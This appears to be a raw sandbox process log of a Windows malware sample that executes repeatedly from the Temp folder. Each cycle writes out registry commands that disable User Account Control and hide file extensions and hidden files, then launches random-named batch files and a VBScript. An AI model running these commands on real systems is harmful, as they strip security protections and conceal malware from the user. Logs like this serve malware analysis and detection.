cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\qIEoAUEc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\qMsMgIUg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\cAcokEoE.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\omIEwMIA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QokkMgAU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\MmMMQYkE.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\rCIYUQkw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\HuskYQss.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\LowMYYIM.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ryYQIMAw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\UIsQUAAc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\gWUYcMgM.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\YEwMQgkg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\CeYkMwgg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "680255874-6637947-768757941-1243019195270051239-1845780151-1192395231-358503286"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\hWIkIEQk.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zSEAQkUU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\dkAsYsQU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\mcQEkIcU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\eskssMcs.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\CQgIEkQc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\PmkkosQo.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "20195434361863332270-1830220939-15463510359219625776395715451510524414-1518471332"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\fSoMkAwc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\bksooMAw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

